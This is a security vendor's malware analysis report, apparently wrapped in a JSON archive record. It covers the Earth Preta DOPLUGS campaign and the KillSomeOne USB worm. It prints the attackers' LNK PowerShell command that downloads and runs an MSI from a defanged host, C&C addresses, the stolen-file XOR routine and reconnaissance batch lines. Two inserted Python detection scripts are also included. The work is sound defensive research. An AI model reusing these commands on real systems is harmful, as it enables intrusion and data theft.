{
	"id": "c7716fbd-9d4e-4d54-8246-2c77a77ec30d",
	"created_at": "2026-04-06T00:17:23.141253Z",
	"updated_at": "2026-04-10T03:36:33.917146Z",
	"deleted_at": null,
	"sha1_hash": "e4fd3b05fff6cc3c9f1f1499137b71dd531d7237",
	"title": "Earth Preta Campaign Uses DOPLUGS to Target Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1892285,
	"plain_text": "Earth Preta Campaign Uses DOPLUGS to Target Asia\r\nBy: Sunny Lu, Pierre Lee\r\nFeb 20, 2024 · Read time: 15 min (3952 words)\r\nPublished: 2024-02-20 · Archived: 2026-04-05 17:51:23 UTC\r\nAPT \u0026 Targeted Attacks\r\nIn this blog entry, we focus on Earth Preta's campaign that employed a variant of the DOPLUGS malware to target Asian countries.\r\nIntroduction\r\nIn July 2023, Check Point disclosed a campaign called SMUGX, which focused on European countries and was attributed to the advanced persistent threat (APT) group Earth Preta (also known as Mustang Panda and Bronze President). In the same year, we obtained a phishing email targeting the Taiwanese government that contained a piece of customized PlugX malware, the same one used in the SMUGX campaign. As most previous discussions from other researchers focus on the European attacks, we would instead like to shed light on the Asian side of the campaign. After months of investigation, we discovered more SMUGX campaign-related samples targeting not only Taiwan, but also Vietnam, Malaysia, and other Asian countries in 2022 and 2023.\r\nThis kind of customized PlugX malware has been active since 2022, with related research published by Secureworks, Recorded Future, Check Point, and Lab52. During analysis, we observed that this customized PlugX malware differs from the general type of PlugX malware, which contains a complete backdoor command module: the customized piece is only used for downloading the general type. Due to its different functionality, we decided to give this customized PlugX malware a new name: DOPLUGS.\r\nUpon investigation, we found that the DOPLUGS malware uses the KillSomeOne module, a USB worm that was first disclosed by a Sophos report in November 2020.
However, an entry from January 2020 had already mentioned a USB worm; that entry was also the first report to analyze a piece of PlugX malware integrated with KillSomeOne behavior.\r\nIn this blog entry, we focus on the Earth Preta campaign, providing an analysis of the DOPLUGS malware variant that the group used, including backdoor command behavior, integration with the KillSomeOne module, and its evolution.\r\nDecoys and victims\r\nBased on noteworthy DOPLUGS files we have found since July 2023 (Table 1), we can determine that the victims, at least for the attacks that employed these specific samples, are from Taiwan and Mongolia. Based on the file names, the files used for social engineering were related to current events, such as the Taiwanese presidential election that took place in January 2024.\r\nVT submission date | LNK file name | Download link in the LNK file | MSI file | Dropped file names\r\nJuly 7, 2023 | Үер усны сэрэмжлүүлэг.lnk (“Flood warning” in Mongolian) | https://estmongolia[.]com/Үер усны сэрэмжлүүлэг | 5f5c3b.msi | OneNoteM.exe, msi.dll, NoteLogger.dat, Үер усны сэрэмжлүүлэг.pdf\r\nAug. 17, 2023 | 選舉民意調查研究問卷.lnk (“Election poll research questionnaire” in traditional Chinese) | https://getfiledown[.]com/utdkt | N/A | N/A\r\nAug. 18, 2023 | 水源路二至五期整建住宅都市更新推動說明.lnk (“Explanation of Urban Renewal Initiative for Residential Development in Phases Two to Five of Shuiyuan Road” in traditional Chinese) | https://getfiledown[.]com/vgbskgyu | 6460c7.msi | OneNoteM.exe, msi.dll, NoteLogger.dat, 水源路二至五期整建住宅都市更新推動說明.pdf\r\nSept. 9, 2023 | 郭台銘選擇賴佩霞為總統副手深層考量.lnk (“Terry Gou's Deeper Considerations in Choosing Tammy Lai as His Vice-Presidential Running Mate” in traditional Chinese) | https://getfilefox[.]com/enmjgwvt | enmjgwvt | OneNoteM.exe, 郭台銘選擇賴佩霞為總統副手深層考量.pdf\r\nTable 1. Noteworthy DOPLUGS files, with some referencing the 2024 Taiwan elections\r\nhttps://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html\r\nPage 1 of 24\r\nThe content of the decoy file 水源路二至五期整建住宅都市更新推動說明.pdf is related to an urban renewal project in Taiwan (written in traditional Chinese).\r\nFigure 1. The decoy document “水源路二至五期整建住宅都市更新推動說明.pdf”\r\nThe decoy file Үер усны сэрэмжлүүлэг.pdf involves a flood warning in Mongolia, written in Mongolian.\r\nFigure 2. The decoy document “Үер усны сэрэмжлүүлэг.pdf”\r\nLooking at VirusTotal data (targeting Asia) from 2022 to 2023, we observed that the perpetrators of the campaign primarily targeted Taiwan and Vietnam, with lower counts from other Asian countries like China, Singapore, Hong Kong, Japan, India, Malaysia, and Mongolia.\r\nFigure 3. Submission count of DOPLUGS on VirusTotal in Asia.\r\nSpear-phishing emails as initial access\r\nThe spear-phishing emails sent to victims contain a Google Drive link that hosts a password-protected archive file, which in turn delivers the DOPLUGS malware. Figure 4 shows a sample email.\r\nFigure 4. Screenshot of a spear-phishing email containing a message regarding the urban renewal project in Taiwan\r\nFigure 5. The Google Drive link embedded in the phishing email; the name of the RAR file on top translates to “Explanation of Urban Renewal Initiative for Residential Development in Phases Two to Five of Shuiyuan Road (attachment password:2024).rar”\r\nThe malicious Windows shortcut (LNK) files seen in Table 1 are disguised as documents and archived in a RAR file. The target command in the LNK file is as follows:\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden $install=New-Object -ComObject 'WindowsInstaller.Installer';$install.uilevel = 2;$install.InstallProduct('https://getfiledown[.]com/vgbskgyu','REMOVE=ALL');$install.InstallProduct('https://getfiledown[.]com/vgbskgy\r\n.\\SsEWyTjKIfqnOTtTycNpSuEH.pdf\r\nSetting UILevel to 2 (msiUILevelNone) suppresses the installer user interface, and passing a URL to InstallProduct makes the Windows Installer service fetch and run the MSI package itself, so the LNK needs no separate download tool.\r\nWhen the victim opens the LNK file, an MSI file is downloaded from https://getfiledown[.]com/vgbskgyu, after which it drops the following files for further execution:\r\n%localappdata%\\MPTfGRunFbCn\\OneNotem.exe (legitimate executable)\r\n%localappdata%\\MPTfGRunFbCn\\msi.dll (malicious DLL file)\r\n%localappdata%\\MPTfGRunFbCn\\NoteLogger.dat (encrypted payload)\r\nAnalysis of the tools used in the campaign\r\nIn this section we go through a detailed analysis of DOPLUGS, DOPLUGS with the KillSomeOne module, and the general type of PlugX malware. Before introducing the malware, we summarize all the published reports related to the analysis in this section, using the timeline here for reference:\r\nFigure 6. Timeline of the malware evolution. The timeline indicates the publishing time, the title and source of the report, and the related malware family.\r\nThe DOPLUGS downloader\r\nDOPLUGS is a downloader with four backdoor commands; one of the commands is designed to download the general type of PlugX malware.
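As an added example (not code from the original report), the following Python applies three command-line patterns taken from this entry to process-creation telemetry such as Sysmon Event ID 1: the LNK's PowerShell invocation of the WindowsInstaller.Installer COM object with a URL argument, the self-deleting batch file that backdoor command 0x1005 drops in %temp%, and the schtasks/netsh task that the KillSomeOne-equipped variant (described later in this entry) uses to keep Wi-Fi enabled. The log lines are constructed for the example, and the exact command line that launches the del_*.bat script is an assumption, since the report only shows the script's contents.

```python
import re

# Added example: a triage filter for process-creation logs. Each rule is a
# name plus the substrings that must all appear (case-insensitive) in one
# command line. The patterns come from the DOPLUGS chain described in the
# report; the log lines below are constructed, not taken from real telemetry.
RULES = [
    # LNK target: PowerShell drives the Windows Installer COM object to pull an MSI from a URL
    ('doplugs_lnk_msi_from_url',
     ['powershell', 'windowsinstaller.installer', 'installproduct(', 'http']),
    # backdoor command 0x1005 drops and runs del_*.bat in %temp% to remove persistence
    # (assumed launch form: cmd.exe /c <path to the batch file>)
    ('doplugs_remove_persistence_bat',
     ['cmd', '/c', 'temp', 'del_', '.bat']),
    # KillSomeOne variant: a SYSTEM scheduled task that re-enables the wireless adapter
    ('killsomeone_wifi_task',
     ['schtasks', '/create', 'netsh interface set interface', 'enabled', '/ru system']),
]

def classify(cmdline):
    '''Return the names of all rules matched by one command line.'''
    low = cmdline.lower()
    return [name for name, needles in RULES if all(n in low for n in needles)]

def triage(lines):
    '''Return [(line_no, rule_names)] for every line that matches at least one rule.'''
    hits = []
    for i, line in enumerate(lines, 1):
        names = classify(line)
        if names:
            hits.append((i, names))
    return hits

# Constructed sample log (CommandLine fields only).
SAMPLE_LOG = [
    # 1: LNK target command from the urban-renewal decoy, up to the first InstallProduct call
    '''C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden $install=New-Object -ComObject 'WindowsInstaller.Installer';$install.uilevel = 2;$install.InstallProduct('https://getfiledown[.]com/vgbskgyu','REMOVE=ALL')''',
    # 2: benign administrative PowerShell
    '''C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File C:\\scripts\\backup.ps1''',
    # 3: the Wi-Fi scheduled task created by the KillSomeOne variant
    '''cmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn \"Security WIFI Script\" /tr \"netsh interface set interface \"\"\"Wireless Network Connection\"\"\" enabled\" /ru SYSTEM /F&schtasks.exe /run /tn \"Security WIFI Script\"''',
    # 4: benign scheduled task
    '''schtasks.exe /create /sc daily /tn Backup /tr C:\\tools\\backup.exe''',
    # 5: assumed launch of the self-delete script that command 0x1005 writes to %temp%
    '''C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\Temp\\del_OneNoteUpdate.bat''',
]

if __name__ == '__main__':
    for line_no, names in triage(SAMPLE_LOG):
        print(line_no, names)
```

The substring rules are deliberately loose so that a renamed binary or reordered arguments still match; tune the needles against your own baseline before alerting on them, since the Windows Installer COM object and netsh tasks do appear in legitimate administration scripts.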
The details of the payload decryption and execution flow were previously discussed by Lab52 in December 2023. Our own analysis instead focuses on backdoor behavior.\r\nFigure 7. Infection flow of DOPLUGS\r\nTable 2 shows the list of files that are part of the infection flow.\r\nFile name | SHA256 | Detection name\r\n水源路二至五期整建住宅都市更新推動說明.lnk (Explanation of Urban Renewal Initiative for Residential Development in Phases Two to Five of Shuiyuan Road.lnk) | 1a8aeee97a31f2de076b8ea5c04471480aefd5d82c57eab280443c7c376f8d5c | Trojan.LNK.DOPLINK.ZTKI\r\n6460c7.msi | 364f38b48565814b576f482c1e0eb4c8d58effcd033fd45136ee00640a2b5321 | Backdoor.Win32.DOPLUGS.ZTKI\r\nOneNotem.exe | b9836265c6bfa17cd5e0265f32cedb1ced3b98e85990d000dc8e1298d5d25f93 | N/A (legitimate executable)\r\nmsi.dll | f8c1a4c3060bc139d8ac9ad88d2632d40a96a87d58aba7862f35a396a18f42e5 | Trojan.Win32.DOPLUGS.ZTKI\r\nNoteLogger.dat | a5cd617434e8d0e8ae25b961830113cba7308c2f1ff274f09247de8ed74cac4f | Backdoor.Win32.DOPLUGS.ZTKI.e\r\nTable 2. File list of the LNK file “水源路二至五期整建住宅都市更新推動說明,” which translates to “Explanation of Urban Renewal Initiative for Residential Development in Phases Two to Five of Shuiyuan Road”\r\nSince 2018, Earth Preta has constantly updated the backdoor command sets in its PlugX malware, which has at least four generations according to our observations:\r\n1. PlugX (no given name for this version)\r\n2. REDDELTA\r\n3. Hodur\r\n4. DOPLUGS\r\nIn summary, the backdoor commands of the first three versions can be divided into two groups. The first group (0x1001) contains the functions customized by the threat actor, while the second group (0x1002) is copied from the general type of PlugX malware. However, in DOPLUGS (the latest version), the backdoor command set has only four commands, with the functions shown in Figure 8.\r\nFigure 8. The DOPLUGS backdoor commands\r\nBackdoor command | Functionality\r\n0x7002 | Starts a CMD shell. The function is copied directly from the shell module in the general type of PlugX malware\r\n0x1007 | Splits the data from the command-and-control (C\u0026C) server by ',', with the following data format: {WINHTTP_OPTION_CONNECT_TIMEOUT},{sleep_time}, {WINHTTP_OPTION_SEND_TIMEOUT},{sleep_time} or {WINHTTP_OPTION_RECEIVE_TIMEOUT},{sleep_time}\r\n0x3004 | Downloads files from the C\u0026C server, including DLL, EXE and DAT files, which make up the general type of PlugX malware\r\n0x1005 | Deletes persistence: deletes the registry key (HKCU or HKLM) Software\\Microsoft\\Windows\\CurrentVersion\\Run and deletes itself by creating and executing a batch file del_OneNoteUpdate.bat in %temp%\r\nTable 3. DOPLUGS backdoor commands.\r\nFigure 9. Code inside the “del_OneNote Update.bat” batch script\r\nWhether sending or receiving data to and from the C\u0026C server, the traffic is encrypted or decrypted with the RC4 algorithm using a 0x20-byte key retrieved from the C\u0026C server (the key is not fixed).\r\nWe also observed another variant (dca39474220575004159ecff70054bcf6239803fcf8d30f4e2e3907b5b97129c) that has different backdoor command values but the same functionality (shown in Table 4).\r\nBackdoor command | Functionality\r\n0x7002 | Starts a CMD shell. The function is copied directly from the shell module in the general type of PlugX malware\r\n0x10000001 | Splits the data from the C\u0026C server by ',', with the data format: {WINHTTP_OPTION_CONNECT_TIMEOUT},{sleep_time}, {WINHTTP_OPTION_SEND_TIMEOUT},{sleep_time}, or {WINHTTP_OPTION_RECEIVE_TIMEOUT},{sleep_time}\r\n0x3004 | Downloads files from the C\u0026C server, including DLL, EXE and DAT files, which make up the general type of PlugX malware\r\n0x1005 | Deletes persistence: deletes the registry key (HKCU or HKLM) Software\\Microsoft\\Windows\\CurrentVersion\\Run and deletes itself by creating and executing a batch file del_Acrobat Update.bat in %temp%\r\nTable 4. Another version of the DOPLUGS backdoor commands\r\nInterestingly, this DOPLUGS version abuses a legitimate Adobe application to lure victims (with most of the samples on VirusTotal sourced from Vietnam). Based on the evolution of the backdoor commands, we suspect that the original purpose of the 0x1002 group in the previous versions was file delivery only. This also explains why the 0x1002 group has been removed from this version: the downloader behavior for the next-stage payload is replaced by the 0x3004 backdoor command.\r\nThe general type of PlugX malware\r\nIn this section, we introduce the general type of PlugX malware that is downloaded via the backdoor command 0x3004 in DOPLUGS. Fortunately, we were able to download two types of final payloads from the C\u0026C server for our analysis.
Table 5 shows the downloaded files.\r\nC\u0026C server source | Type | Files (description) | PlugX C\u0026C server\r\nelectrictulsa[.]com:443 | 1 | adobe_licensing_wf_helper.exe (legitimate executable for sideloading), libcef.dll (malicious loader), licensing.dat (encrypted payload) | web[.]bonuscave[.]com:8080\r\nivibers[.]com:443 or meetviberapi[.]com:443 | 2 | Avastsz.exe (legitimate executable for sideloading), SZBrowser.dll (malicious loader), log.dat (encrypted payload) | www[.]markplay[.]net:8080, images[.]markplay[.]net:443\r\n149[.]104[.]12[.]64:443 | 2 | Avastsz.exe (legitimate executable for sideloading), SZBrowser.dll (malicious loader), log.dat (encrypted payload) | news[.]comsnews[.]com:443, news[.]comsnews[.]com:5938, images[.]kiidcloud[.]com:443, 127[.]0[.]0[.]1:8080, 127[.]0[.]0[.]1:8000\r\nTable 5. List of general PlugX malware types downloaded via DOPLUGS\r\nAccording to a report published by Palo Alto, these samples of the general PlugX malware might be modified from the THOR PlugX, based on the following observations:\r\n1. Both have a similar code structure in the DLL loaders.\r\n2. Both have the same shellcode before entering the PlugX main function.\r\n3. Both use the same arguments in command-line execution.\r\nFigure 10. The function to enter the shellcode in the loader of the THOR PlugX malware (top) and the Earth Preta general type of PlugX malware (bottom)\r\nFigure 11. The shellcode of the THOR PlugX malware (top) and the Earth Preta general type of PlugX malware (bottom)\r\nFigure 12. The arguments used in the command line of the THOR PlugX malware (top) and the Earth Preta general type of PlugX malware (bottom)\r\nFile name | SHA256\r\nadobe_licensing_wf_helper.exe | 93624d0ad03998dd267ae8048ff05e25b5fd5f7b4116a2aff88c87d42422d5dc\r\nlibcef.dll | 583941ca6e1a2e007f5f0e2e112054e44b18687894ac173d0e93e035cea25e83\r\nlicensing.dat | e3bae2e2b757a76db92ab017328d1459b181f8d98e04b691b62ff65d1e1be280\r\nTable 6. File list of the type 1 general type of PlugX malware\r\nWhen the adobe_licensing_wf_helper.exe file is launched by DOPLUGS, the command line has no argument. The execution flow is as follows:\r\n1. adobe_licensing_wf_helper.exe (no argument) installs the files and sets persistence.\r\n2. adobe_licensing_wf_helper.exe 600 0 injects itself into %SystemRoot%\\system32\\WerFault.exe with the arguments 601 0.\r\n3. %SystemRoot%\\system32\\WerFault.exe 601 0 executes the backdoor commands.\r\nHere is the functionality of each first argument:\r\nFirst argument | Functionality\r\nNone | Same as 100\r\n100 | Sets persistence: installs files into %ProgramFiles%\\Common Files\\Adobe Licensing Helper; creates a service named Adobe Licensing Helper with the command line %ProgramFiles%\\Common Files\\Adobe Licensing Helper\\adobe_licensing_wf_helper.exe 600 0; creates a value named Adobe Licensing Helper under Software\\Microsoft\\Windows\\CurrentVersion\\Run with the same command line\r\n600 | Injects the PlugX process into %SystemRoot%\\system32\\WerFault.exe with the arguments 601 0\r\n601 | Executes the backdoor commands of the general type of PlugX malware\r\n609 | Receives backdoor commands from a pipe and sends the results back to the main process through the pipe\r\nTable 7. The functionalities of each first argument\r\nFile name | SHA256\r\nAvastsz.exe | b975af70ee9bdfdc6e491b58dd83385f3396429a728f9939abade48d15941ea1\r\nSZBrowser.dll | 60b3a42b96b98868cae2c8f87d6ed74a57a64b284917e8e0f6c248c691d51797\r\nlog.dat | eb9e557fac3dd50cc46a544975235ebfce6b592e90437d967c9afba234a33f13\r\nTable 8. File list of the type 2 general type of PlugX malware\r\nIn type 2, the command-line argument values change from 6xx to 7xx but keep the same functionality.\r\nFigure 13. The arguments used in the command line of type 2 PlugX\r\nAnother difference is the configuration decryption. In the type 1 PlugX malware, the configuration section is in plain text after decryption, but in type 2 it is still encrypted: the configuration data is decrypted again with the RC4 key qwedfgx202211 only when the process needs it.\r\nFigure 14. The encrypted C\u0026C server in the configuration (shown as “www.markplay[.]net” when decrypted)\r\nFigure 15. Encrypted installation directory in the configuration (“%ProgramFiles%\\Common Files\\System\\Avast” when decrypted)\r\nFigure 16. The encrypted registry name in the configuration (Avast Browser Service when decrypted)\r\nOffset | Value\r\n+0x10 | File extensions that are read by the keylogger: *.doc*, *.pdf, *.xls, *.ppt*, *.mp3, *.wav\r\n+0x828 | C\u0026C list\r\n+0xD58 | Install directory\r\n+0xF58 | Registry name\r\n+0x1158 | Service name\r\n+0x1358 | Service name\r\n+0x1558 | RC4 key for packets\r\nTable 9. The configuration structure of the type 2 PlugX malware\r\nIntegration with KillSomeOne\r\nWhile hunting for more DOPLUGS-related samples, we came across a DOPLUGS variant with KillSomeOne functionality. The KillSomeOne module is a plug-in specializing in malware distribution, information collection, and document theft via USB. It expands the ability to infect so that initial access methods are not limited to phishing or decoy documents.\r\nThe KillSomeOne module was first introduced in a November 2020 Sophos report. The DOPLUGS variant with the KillSomeOne module is highly similar to the DOPLUGS variant we analyzed above, with one of the major differences being the infection method. It has four components: a legitimate executable, a malicious DLL, an encrypted payload, and an encrypted PE file.
This variant has an extra launcher file that executes the legitimate executable to perform DLL sideloading.\r\nArchive | File name | Description\r\n1.rar (a0c94205ca2ed1bcdf065c7aeb96a0c99f33495e7bbfd2ccba36daebd829a916) | HPSmart.exe | Legitimate EXE\r\n1.rar | InstanceFinderDlgUI.dll | Malicious DLL\r\n1.rar | InstanceFinderDlg.dat | Encrypted payload\r\n1.rar | HPReport.exe | Encrypted launcher\r\nTable 10. File list of the DOPLUGS variant with the KillSomeOne module\r\nThe loader InstanceFinderDlgUI.dll, compiled in Golang, is the only one we found. Figure 17 shows its functions.\r\nFigure 17. Golang functions of the file “InstanceFinderDlgUI.dll”\r\nIts execution flow is as follows:\r\n1. It reads the encrypted payload, InstanceFinderDlg.dat, from the same folder.\r\n2. It decrypts the payload by XOR with the single-byte key 0x73.\r\n3. It enters the decrypted payload via main_NTCreateThreadEx.\r\nThe payload behaves similarly to the regular DOPLUGS variant. The function checks the argument of the command line HPSmart.exe “argument”. There is no argument on the first execution: it only sets up persistence and relaunches itself with an argument, which is a random three-digit number. We list the command-line arguments and their corresponding behavior in the following table:\r\nArgument | Behavior\r\nNo argument | Sets up persistence\r\nXXX (random three-digit number) | KillSomeOne thread / DOPLUGS backdoor behavior\r\n-net | Sets up persistence / sets the registry value System\\CurrentControlSet\\Control\\Network\\Version to “1”\r\n“1” “0” | Enables Wi-Fi connection\r\nTable 11. The behavior of each command-line argument\r\nPersistence is set up via the following steps:\r\n1. The function copies all the files to the installation directory, C:\\Users\\Public\\HPSmartMZWx\\.\r\n2. It sets the value C:\\Users\\Public\\HPSmartMZWx\\HPSmart.exe xxx in the registry Software\\Microsoft\\Windows\\CurrentVersion\\Run key for persistence.\r\n3. It creates the process C:\\Users\\Public\\HPSmartMZWx\\HPSmart.exe xxx.\r\nThe KillSomeOne thread has two major behaviors. The first removes all traces related to previous pieces of PlugX malware, including files, processes, registry entries, and scheduled tasks.\r\nDeleted object | Target name list\r\nProcess (with its corresponding folder and persistence in registry) | Adobe Desktop Service.exe, identity_helper.exe, pidgin.exe, WaveeditsNero.exe, svchost.exe (if no argument), WaveeditNero.exe, gup.exe, Silverlight.Configuration.exe, waveedit.exe, waveedits.exe, Adobe_licensing_wf.exe, adobe_wf.exe, MicrosoftEdges.exe, Opera.exe, WeChat.exe, symantecs.exe, Symantec.exe, msexpert.exe, vivaldi.exe, CUZ.exe, RzCef.exe, CefRender.exe, RzProcess.exe, RzerProcess.exe, service_host.exe, mfpmp.exe\r\nScheduled tasks | udisk_1, udisk_2, ZBT_0.1, LKUFORYOU_1, AcroRd32, udisk_1.00, LKUFORYOU_2, udisk_1.03, udisk_1.02, AdobeDesktop\r\nValue in registry key (HKCU or HKLM) Software\\Microsoft\\Windows\\CurrentVersion\\Run | Razer, RzCef, CefRender, RzerProcess, CefRz, X32dbg, vstool_x86, WindowsNT, nvcplui, NeroEdit, AdobeDesktop\r\nFolder | C:\\Users\\Public\\AdobeDesktop\\, C:\\ProgramData\\Razer\\, C:\\ProgramData\\RazerCefProcess\\, C:\\ProgramData\\CefRz\\, C:\\ProgramData\\DebugReport\\, C:\\programData\\RzerProcess\\, C:\\ProgramData\\SymantecSEndpoint\\Bin\\\r\nFile | C:\\ProgramData\\FmtOptions.dll (possibly related to LuminousMouth)\r\nTable 12. Removing traces of the previous piece of PlugX malware\r\nThe second behavior is related to USB infection. It calls the DeviceIoControl API with the control code 0x2d1400 (IOCTL_STORAGE_QUERY_PROPERTY, which reports a device's bus type) to identify USB drives. It then creates three threads for the targeted USB drive, which we detail in the following sections.\r\nThread 1: Worm behavior in USB drive (Lateral Movement)\r\nThis thread creates the mutex USB_NOTIFY3_INF_{USB_volume} as a marker. Before the worm behavior, the following registry values are set to hide file extensions and the folders that contain malware and stolen documents:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced, Hidden=0\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced, ShowSuperHidden=0\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced, HideFileExt=1\r\nIn infected USB drives, the four components are copied into the hidden folder:\r\nHPReport.exe to {USB_volume}:\\Usb Drive\\1.0\\5.dat\r\nHPSmart.exe to {USB_volume}:\\Usb Drive\\1.0\\6.dat\r\nInstanceFinderDlgUI.dll to {USB_volume}:\\Usb Drive\\1.0\\2.dat\r\nInstanceFinderDlg.dat to {USB_volume}:\\Usb Drive\\1.0\\InstanceFinderDlg.dat\r\nFigure 18. The four files copied to a USB drive.\r\nThe decrypted launcher, HPReport.exe, is copied to {USB_volume}:\\Usb Disk ({free space of USB}).exe (which is disguised as a USB drive) and duplicated under the name opn-U({free space of USB}).cmd in the following folders:\r\n{USB_volume}:\\AVAST\\Protection for Autorun\\\r\n{USB_volume}:\\SMADAV\\SMADAV\\\r\n{USB_volume}:\\Removable Disk\\\r\nThe KillSomeOne module specializes in USB infections. The launcher pretends to be a USB disk to lure victims into opening it, a convincing guise unless users check the extension, which the HideFileExt=1 setting above hides from them.
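As an added example (not code from the original report), the following Python walks a mounted or imaged removable drive and reports the on-disk artifacts of the KillSomeOne worm described above: the staging folder with the renamed components (2.dat, 5.dat, 6.dat, InstanceFinderDlg.dat), the Usb Disk (N).exe lure in the drive root, the opn-U(N).cmd launcher copies, and the Usb Disk collection folder. The host-side Explorer registry changes (Hidden, ShowSuperHidden, HideFileExt) are not part of the drive and are left to host triage. The infected-drive layout is constructed in a temporary directory for the example; the file names and paths are the ones listed in this entry, and the file contents are placeholders.

```python
import os
import re
import tempfile

# Added example: triage of a removable drive for KillSomeOne artifacts.
# Paths are the ones reported for the DOPLUGS + KillSomeOne variant.
STAGING_DIRS = [
    os.path.join('Usb Drive', '1.0'),
    os.path.join('Kaspersky', 'Usb Drive', '1.0'),
    os.path.join('.System', 'Device', 'USB', '3.0', 'Usb Drive', '1.0'),
    os.path.join('.System', 'Device', 'USB', '3.0', 'Kaspersky', 'Usb Drive', '1.0'),
]
STAGED_COMPONENTS = {'2.dat', '5.dat', '6.dat', 'InstanceFinderDlg.dat'}
LAUNCHER_COPY_DIRS = [
    os.path.join('AVAST', 'Protection for Autorun'),
    os.path.join('SMADAV', 'SMADAV'),
    'Removable Disk',
]
# Usb Disk (<free space>).exe and opn-U(<free space>).cmd; the number varies per drive
LURE_EXE = re.compile(r'^Usb Disk [(][0-9]+[)][.]exe$', re.IGNORECASE)
LAUNCHER_CMD = re.compile(r'^opn-U[(][0-9]+[)][.]cmd$', re.IGNORECASE)

def is_pe(path):
    '''True if the file starts with the MZ header (the lure and the renamed DLL/EXE are PE files).'''
    try:
        with open(path, 'rb') as f:
            return f.read(2) == b'MZ'
    except OSError:
        return False

def scan_drive(root):
    '''Return a sorted list of (indicator, relative_path) findings for one drive root.'''
    findings = []
    for d in STAGING_DIRS:
        full = os.path.join(root, d)
        if os.path.isdir(full):
            present = STAGED_COMPONENTS & set(os.listdir(full))
            if present:
                findings.append(('staged_components:' + ','.join(sorted(present)), d))
            # thread 3 looks for encrypted batch scripts in a 'p' subfolder of the staging dir
            if os.path.isdir(os.path.join(full, 'p')):
                findings.append(('staged_batch_scripts', os.path.join(d, 'p')))
    for name in os.listdir(root):
        if LURE_EXE.match(name) and is_pe(os.path.join(root, name)):
            findings.append(('usb_disk_lure_exe', name))
    for d in LAUNCHER_COPY_DIRS:
        full = os.path.join(root, d)
        if os.path.isdir(full):
            for name in os.listdir(full):
                if LAUNCHER_CMD.match(name):
                    findings.append(('launcher_copy_cmd', os.path.join(d, name)))
    if os.path.isdir(os.path.join(root, 'Usb Disk')):
        findings.append(('collection_folder', 'Usb Disk'))
    return sorted(findings)

def build_sample_drive(infected=True):
    '''Constructed drive layout for the example; returns its root path.'''
    root = tempfile.mkdtemp(prefix='usb_')
    def put(rel, data):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'wb') as f:
            f.write(data)
    pe = b'MZ' + bytes(62)          # placeholder PE header
    put('holiday.jpg', b'JFIF')     # an ordinary user file
    if infected:
        staging = os.path.join('Usb Drive', '1.0')
        put(os.path.join(staging, '2.dat'), pe)                   # InstanceFinderDlgUI.dll, renamed
        put(os.path.join(staging, '5.dat'), bytes([0x73]) * 64)   # encrypted launcher
        put(os.path.join(staging, '6.dat'), pe)                   # HPSmart.exe, renamed
        put(os.path.join(staging, 'InstanceFinderDlg.dat'), bytes([0x73]) * 64)
        put('Usb Disk (7412).exe', pe)                            # decrypted launcher posing as a drive
        put(os.path.join('AVAST', 'Protection for Autorun', 'opn-U(7412).cmd'), pe)
        put(os.path.join('Usb Disk', 'report.docx'), b'PK')        # harvested document copy
    return root

if __name__ == '__main__':
    for indicator, rel in scan_drive(build_sample_drive()):
        print(indicator, rel)
```

Run it against the drive root (for example scan_drive('/mnt/usb') or scan_drive('E:/') on Windows); any hit in the staging folders should be preserved as evidence, since those files are what the worm renames and executes on the next host.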
The purpose of the launcher is simple: it renames 2.dat to InstanceFinderDlgUI.dll and executes 6.dat, the legitimate executable, which then sideloads InstanceFinderDlgUI.dll.\r\nFigure 19. The decrypted launcher in the USB drive\r\nAll the files under the following folders are copied to {USB_volume}:\\Usb Disk\\:\r\n{USB_volume}:\\\r\n{USB_volume}:\\Kaspersky\\\r\n{USB_volume}:\\Kaspersky\\Usb Drive\\\r\n{USB_volume}:\\Usb Drive\\3.0\\\r\n{USB_volume}:\\Kaspersky\\Removable Disk\\ (including files in subfolders)\r\n{USB_volume}:\\AVAST\\Protection for Autorun\\ (including files in subfolders)\r\n{USB_volume}:\\SMADAV\\SMADAV\\ (including files in subfolders)\r\nThread 2: Stealing files from the USB drive (Collection)\r\nThis thread creates the mutex USB_NOTIFY3_COP_{USB_volume} as a marker. There are two stealing conditions, each of which we discuss here.\r\nIf the connection to https://www.microsoft.com/ succeeds, it checks the file extensions in these predefined folders:\r\n{USB_volume}:\\Kaspersky\\Usb Drive\\1.0\\\r\n{USB_volume}:\\Usb Drive\\1.0\\\r\n{USB_volume}:\\.System\\Device\\USB\\3.0\\Kaspersky\\Usb Drive\\1.0\r\n{USB_volume}:\\.System\\Device\\USB\\3.0\\Usb Drive\\1.0\\\r\nIf the file extension is not .cmd, .bat, or .dll and the file name is not RECYCLERS.BIN, it moves the file to %userprofile%\\AppData\\Roaming\\Render\\1.0\\ and empties the content of the original file.\r\nWe also found another functionality, but it seems not to have been implemented as of this writing. This functionality collects all files under the same folders and looks for files with the following extensions: .doc, .docx, .ppt, .pptx, .xls, .xlsx, .pdf. Afterward, it encodes the file name with base64, encrypts the file content, and copies the file to the folder of the current process.\r\nHere is the XOR algorithm used to encrypt the stolen files (contents is the byte string of the stolen file; the key is a single byte, so it wraps modulo 256):\r\nencrypted_contents = bytearray()\r\nencrypted_key = 0x6D\r\nfor i in range(len(contents)):\r\n    encrypted_contents.append(contents[i] ^ encrypted_key)\r\n    encrypted_key = (encrypted_key + 0xAA) \u0026 0xFF\r\nIf the connection fails, the thread checks the registry value (HKCU or HKLM)\\System\\CurrentControlSet\\Control\\Network\\Version; when it does not exist, the thread creates and executes the batch script %temp%\\edg{value of QueryPerformanceCounter}.bat to collect information about the victim:\r\n%comspec% /q /c systeminfo \u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\n%comspec% /q /c ipconfig /all \u003e\u003e\"%~dp0AE353BBEB1C6603E_E.dat\"\r\n%comspec% /q /c netstat -ano 